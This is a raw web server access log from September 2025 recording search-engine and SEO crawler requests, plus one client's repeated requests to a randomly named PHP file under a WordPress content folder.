69.197.149.50 - - [18/Sep/2025:01:06:57 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:01:08:48 -0300] "GET /q-~31veBBSR8x2ZlnLQOul0FMDY9PBx2KMk31618/ HTTP/1.1" 200 10382 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
92.222.104.214 - - [18/Sep/2025:01:09:35 -0300] "GET /uploads/post/9a143407900565b1e9c64b5492b84ac9.jpg HTTP/1.1" 200 110238 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
5.39.109.188 - - [18/Sep/2025:01:09:40 -0300] "GET /uploads/post/f6db44044e165baaf971bbede9fa991c.jpg HTTP/1.1" 200 116368 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
37.59.204.137 - - [18/Sep/2025:01:09:41 -0300] "GET /uploads/post/6cec91529a4f2d4bc414ba9ef109b5f3.jpg HTTP/1.1" 200 111982 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
69.197.149.50 - - [18/Sep/2025:01:08:26 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:01:10:20 -0300] "GET /q-~99m6LTY89cnFNT8XBnPelx8LDL4FQYHC14602/ HTTP/1.1" 200 11819 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
66.249.70.1 - - [18/Sep/2025:01:10:35 -0300] "GET /q-~190u7xqZVsItuVzaXKzAkkLLtF9hx1ffX40841/ HTTP/1.1" 200 12183 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
69.197.149.50 - - [18/Sep/2025:01:10:00 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
66.249.70.8 - - [18/Sep/2025:01:11:53 -0300] "GET /q-~131LVuTBKGkXbw3V8PdbqjJhLrCMt8dNR36012/ HTTP/1.1" 200 9349 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.127 Mobile Safari/537.36 (compatible; GoogleOther)"
69.197.149.50 - - [18/Sep/2025:01:11:29 -0300] "GET /wp-content/imec50e5/index.php?id=604206 HTTP/1.1" 200 - "http://admin.evidenciarevista.com.br/wp-content/imec50e5/index.php?id=604206" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
